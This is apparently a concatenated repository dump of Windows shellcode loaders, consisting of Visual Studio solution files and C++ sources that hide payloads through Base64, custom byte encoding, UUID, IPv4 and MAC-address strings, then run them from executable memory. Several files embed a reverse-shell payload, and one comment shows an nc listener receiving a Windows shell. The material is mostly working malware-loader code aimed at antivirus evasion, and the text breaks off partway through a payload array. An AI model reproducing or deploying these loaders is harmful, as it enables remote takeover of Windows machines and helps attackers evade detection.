17 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x64.Build.0 = Debug|x64
18 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x86.ActiveCfg = Debug|Win32
19 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x86.Build.0 = Debug|Win32
20 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x64.ActiveCfg = Release|x64
21 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x64.Build.0 = Release|x64
22 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x86.ActiveCfg = Release|Win32
23 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {78615000-013E-402D-92C0-AFD019997827}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CustomEncoding", "CustomEncoding.vcxproj", "{847D29FF-8BBC-4068-8BE1-D84B1089B3C0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x64.ActiveCfg = Debug|x64
17 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x64.Build.0 = Debug|x64
18 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x86.ActiveCfg = Debug|Win32
19 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x86.Build.0 = Debug|Win32
20 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x64.ActiveCfg = Release|x64
21 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x64.Build.0 = Release|x64
22 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x86.ActiveCfg = Release|Win32
23 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {1BA97A6D-D8D8-41A3-BDB3-D2AAF018C040}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FilelessShellcode", "FilelessShellcode.vcxproj", "{1617117C-0E94-4E6A-922C-836D616EC1F5}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x64.ActiveCfg = Debug|x64
17 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x64.Build.0 = Debug|x64
18 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x86.ActiveCfg = Debug|Win32
19 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x86.Build.0 = Debug|Win32
20 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x64.ActiveCfg = Release|x64
21 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x64.Build.0 = Release|x64
22 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x86.ActiveCfg = Release|Win32
23 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E2D488A1-2E05-475F-8395-35C38DE2532C}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinhttpShellcode", "WinhttpShellcode.vcxproj", "{9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x64.ActiveCfg = Debug|x64
17 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x64.Build.0 = Debug|x64
18 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x86.Build.0 = Debug|Win32
20 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x64.ActiveCfg = Release|x64
21 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x64.Build.0 = Release|x64
22 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x86.ActiveCfg = Release|Win32
23 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {26F29BF5-15A1-4703-A150-B7D04C44D789}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib, "Ntdll.lib")
5 |
6 | #ifndef NT_SUCCESS
7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
8 | #endif
9 |
10 | #define _CRT_SECURE_NO_WARNINGS
11 | #pragma warning(disable:4996)
12 |
13 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
14 | int Error(const char* msg) {
15 | printf("%s (%u)", msg, GetLastError());
16 | return 1;
17 | }
18 |
19 | int main() {
20 |
21 |
22 |
23 | const char* MAC[] =
24 | {
25 | "90-90-90-90-90-90",
26 | "90-90-90-90-90-90",
27 | "90-90-90-90-90-90",
28 | "90-90-90-90-90-90",
29 | "90-90-90-90-90-90",
30 | "90-90-90-90-90-90",
31 | "90-90-90-90-90-90"
32 | };
33 |
34 |
35 | int rowLen = sizeof(MAC) / sizeof(MAC[0]);
36 | PCSTR Terminator = NULL;
37 | NTSTATUS STATUS;
38 |
39 |
40 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
41 | void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);
42 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
43 |
44 | for (int i = 0; i < rowLen; i++) {
45 | STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);
46 | if (!NT_SUCCESS(STATUS)) {
47 | printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());
48 | return FALSE;
49 | }
50 | ptr += 6;
51 | }
52 |
53 |
54 |
55 |
56 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
57 | if (!tHandle) {
58 | printf("Failed to Create the thread (%u)\n", GetLastError());
59 | return -3;
60 | }
61 |
62 | WaitForSingleObject(tHandle, INFINITE);
63 |
64 | printf("alloc_mem\n", alloc_mem);
65 | getchar();
66 |
67 | return 0;
68 |
69 | }
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma comment (lib, "Crypt32.lib")
4 |
5 |
6 | int main(void) {
7 | // calc
8 | //const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";
9 | // reverse shell
10 | const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";
11 | DWORD payloadLen = sizeof(payload);
12 |
13 | LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
14 | if (!alloc_mem) {
15 | printf("Failed to allocate memory (%u)\n", GetLastError());
16 | return -1;
17 | }
18 |
19 | // base64 decoding
20 | if (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {
21 | printf("Failed to decode the payload(%u)\n", GetLastError());
22 | return -2;
23 | }
24 |
25 | DWORD OldProtect;
26 |
27 | if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {
28 | printf("Failed to change memory protection (%u)\n", GetLastError());
29 | return -3;
30 | }
31 |
32 | ((void(*)())alloc_mem)();
33 |
34 |
35 | /*
36 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
37 | if (!tHandle) {
38 | printf("Failed to Create the thread (%u)\n", GetLastError());
39 | return -3;
40 | }
41 |
42 | WaitForSingleObject(tHandle, INFINITE);
43 | */
44 |
45 |
46 | return 0;
47 | }
48 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | ┌──(root㉿kali)-[~]
3 | └─# nc -lvnp 1234
4 | listening on [any] 1234 ...
5 | connect to [100.91.176.13] from (UNKNOWN) [100.91.176.239] 52747
6 | Microsoft Windows [Version 10.0.19044.2251]
7 | (c) Microsoft Corporation. All rights reserved.
8 |
9 | C:\Users\saaad\Desktop\HTB\1 - Loaders\1 - Simple Loader\SimpleLoader\x64\Release>whoami
10 | whoami
11 | desktop\d1rkmtr
12 |
13 | */
14 |
15 | #include
16 | #include
17 |
18 | int main() {
19 |
20 | // use payload/windows/x64/shell_reverse_tcp
21 | // generate -f c
22 | unsigned char payload[] =
23 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
24 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
25 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
26 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
27 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
28 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
29 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
30 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
31 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
32 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
33 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
34 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
35 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
36 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
37 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
38 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
39 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
40 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
41 | "\x63\x2e\x65\x78\x65\x00";
42 |
43 |
44 |
45 | LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
46 |
47 | if (!alloc_mem) {
48 | printf("Failed to Allocate memory (%u)\n", GetLastError());
49 | return -1;
50 | }
51 |
52 | MoveMemory(alloc_mem, payload, sizeof(payload));
53 | //RtlMoveMemory(alloc_mem, payload, sizeof(payload));
54 |
55 |
56 | DWORD oldProtect;
57 |
58 | if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {
59 | printf("Failed to change memory protection (%u)\n", GetLastError());
60 | return -2;
61 | }
62 |
63 |
64 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
65 | if (!tHandle) {
66 | printf("Failed to Create the thread (%u)\n", GetLastError());
67 | return -3;
68 | }
69 |
70 | printf("\n\nalloc_mem : %p\n", alloc_mem);
71 | WaitForSingleObject(tHandle, INFINITE);
72 | getchar();
73 | // or
74 |
75 | //((void(*)())alloc_mem)();
76 |
77 | return 0;
78 | }
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.cpp:
--------------------------------------------------------------------------------
1 | // Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "Rpcrt4.lib")
7 |
8 | int main() {
9 |
10 | const char* uuids[] =
11 | {
12 | "e48348fc-e8f0-00c0-0000-415141505251",
13 | "d2314856-4865-528b-6048-8b5218488b52",
14 | "728b4820-4850-b70f-4a4a-4d31c94831c0",
15 | "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",
16 | "48514152-528b-8b20-423c-4801d08b8088",
17 | "48000000-c085-6774-4801-d0508b481844",
18 | "4920408b-d001-56e3-48ff-c9418b348848",
19 | "314dd601-48c9-c031-ac41-c1c90d4101c1",
20 | "f175e038-034c-244c-0845-39d175d85844",
21 | "4924408b-d001-4166-8b0c-48448b401c49",
22 | "8b41d001-8804-0148-d041-5841585e595a",
23 | "59415841-5a41-8348-ec20-4152ffe05841",
24 | "8b485a59-e912-ff57-ffff-5d49be777332",
25 | "0032335f-4100-4956-89e6-4881eca00100",
26 | "e5894900-bc49-0002-04d2-645bb00d4154",
27 | "4ce48949-f189-ba41-4c77-2607ffd54c89",
28 | "010168ea-0000-4159-ba29-806b00ffd550",
29 | "c9314d50-314d-48c0-ffc0-4889c248ffc0",
30 | "41c18948-eaba-df0f-e0ff-d54889c76a10",
31 | "894c5841-48e2-f989-41ba-99a57461ffd5",
32 | "40c48148-0002-4900-b863-6d6400000000",
33 | "41504100-4850-e289-5757-574d31c06a0d",
34 | "e2504159-66fc-44c7-2454-0101488d4424",
35 | "6800c618-8948-56e6-5041-504150415049",
36 | "5041c0ff-ff49-4dc8-89c1-4c89c141ba79",
37 | "ff863fcc-48d5-d231-48ff-ca8b0e41ba08",
38 | "ff601d87-bbd5-1de0-2a0a-41baa695bd9d",
39 | "8348d5ff-28c4-063c-7c0a-80fbe07505bb",
40 | "6f721347-006a-4159-89da-ffd590909090"
41 | };
42 |
43 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
44 | void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);
45 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
46 | int init = sizeof(uuids) / sizeof(uuids[0]);
47 |
48 | for (int i = 0; i < init; i++) {
49 | RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);
50 | if (status != RPC_S_OK) {
51 | printf("UuidFromStringA != RPC_S_OK\n");
52 | CloseHandle(alloc_mem);
53 | return -1;
54 | }
55 | ptr += 16;
56 | }
57 | /*
58 | printf("[+] HexDump: \n");
59 | for (int i = 0; i < init * 16; i++) {
60 | printf("%02X ", ((unsigned char*)alloc_mem)[i]);
61 | }
62 | */
63 |
64 | //((void(*)())alloc_mem)();
65 |
66 |
67 | /*
68 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
69 | if (!tHandle) {
70 | printf("Failed to Create the thread (%u)\n", GetLastError());
71 | return -3;
72 | }
73 |
74 | WaitForSingleObject(tHandle, INFINITE);
75 | */
76 | EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0);
77 |
78 | return 0;
79 |
80 |
81 | }
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib, "Ntdll.lib")
5 |
6 | #ifndef NT_SUCCESS
7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
8 | #endif
9 |
10 | int main() {
11 |
12 | const char* IPv4s[] =
13 | {
14 | "252.72.131.228",
15 | "240.232.192.0",
16 | "0.0.65.81",
17 | "65.80.82.81",
18 | "86.72.49.210",
19 | "101.72.139.82",
20 | "96.72.139.82",
21 | "24.72.139.82",
22 | "32.72.139.114",
23 | "80.72.15.183",
24 | "74.74.77.49",
25 | "201.72.49.192",
26 | "172.60.97.124",
27 | "2.44.32.65",
28 | "193.201.13.65",
29 | "1.193.226.237",
30 | "82.65.81.72",
31 | "139.82.32.139",
32 | "66.60.72.1",
33 | "208.139.128.136",
34 | "0.0.0.72",
35 | "133.192.116.103",
36 | "72.1.208.80",
37 | "139.72.24.68",
38 | "139.64.32.73",
39 | "1.208.227.86",
40 | "72.255.201.65",
41 | "139.52.136.72",
42 | "1.214.77.49",
43 | "201.72.49.192",
44 | "172.65.193.201",
45 | "13.65.1.193",
46 | "56.224.117.241",
47 | "76.3.76.36",
48 | "8.69.57.209",
49 | "117.216.88.68",
50 | "139.64.36.73",
51 | "1.208.102.65",
52 | "139.12.72.68",
53 | "139.64.28.73",
54 | "1.208.65.139",
55 | "4.136.72.1",
56 | "208.65.88.65",
57 | "88.94.89.90",
58 | "65.88.65.89",
59 | "65.90.72.131",
60 | "236.32.65.82",
61 | "255.224.88.65",
62 | "89.90.72.139",
63 | "18.233.87.255",
64 | "255.255.93.73",
65 | "190.119.115.50",
66 | "95.51.50.0",
67 | "0.65.86.73",
68 | "137.230.72.129",
69 | "236.160.1.0",
70 | "0.73.137.229",
71 | "73.188.2.0",
72 | "4.210.100.91",
73 | "176.26.65.84",
74 | "73.137.228.76",
75 | "137.241.65.186",
76 | "76.119.38.7",
77 | "255.213.76.137",
78 | "234.104.1.1",
79 | "0.0.89.65",
80 | "186.41.128.107",
81 | "0.255.213.80",
82 | "80.77.49.201",
83 | "77.49.192.72",
84 | "255.192.72.137",
85 | "194.72.255.192",
86 | "72.137.193.65",
87 | "186.234.15.223",
88 | "224.255.213.72",
89 | "137.199.106.16",
90 | "65.88.76.137",
91 | "226.72.137.249",
92 | "65.186.153.165",
93 | "116.97.255.213",
94 | "72.129.196.64",
95 | "2.0.0.73",
96 | "184.99.109.100",
97 | "0.0.0.0",
98 | "0.65.80.65",
99 | "80.72.137.226",
100 | "87.87.87.77",
101 | "49.192.106.13",
102 | "89.65.80.226",
103 | "252.102.199.68",
104 | "36.84.1.1",
105 | "72.141.68.36",
106 | "24.198.0.104",
107 | "72.137.230.86",
108 | "80.65.80.65",
109 | "80.65.80.73",
110 | "255.192.65.80",
111 | "73.255.200.77",
112 | "137.193.76.137",
113 | "193.65.186.121",
114 | "204.63.134.255",
115 | "213.72.49.210",
116 | "72.255.202.139",
117 | "14.65.186.8",
118 | "135.29.96.255",
119 | "213.187.224.29",
120 | "42.10.65.186",
121 | "166.149.189.157",
122 | "255.213.72.131",
123 | "196.40.60.6",
124 | "124.10.128.251",
125 | "224.117.5.187",
126 | "71.19.114.111",
127 | "106.0.89.65",
128 | "137.218.255.213",
129 | };
130 |
131 |
132 | PCSTR Terminator = NULL;
133 | PVOID LpBaseAddress = NULL;
134 | PVOID LpBaseAddress2 = NULL;
135 | NTSTATUS STATUS;
136 |
137 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
138 | if (!hHeap) {
139 | printf("Failed to create a heap (%u)\n", GetLastError());
140 | return -1;
141 | }
142 | void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
143 | if (!alloc_mem) {
144 | printf("Failed to allocate memory on the heap (%u)\n", GetLastError());
145 | return -2;
146 | }
147 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
148 | int init = sizeof(IPv4s) / sizeof(IPv4s[0]);
149 |
150 | for (int i = 0; i < init; i++) {
151 | RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);
152 | if (!NT_SUCCESS(STATUS)) {
153 | printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());
154 | return FALSE;
155 | }
156 | ptr += 4;
157 | }
158 |
159 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
160 | if (!tHandle) {
161 | printf("Failed to Create the thread (%u)\n", GetLastError());
162 | return -3;
163 | }
164 |
165 | WaitForSingleObject(tHandle, INFINITE);
166 |
167 |
168 | return 0;
169 | }
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // calc
5 | //unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };
6 | // reverse shell
7 | unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 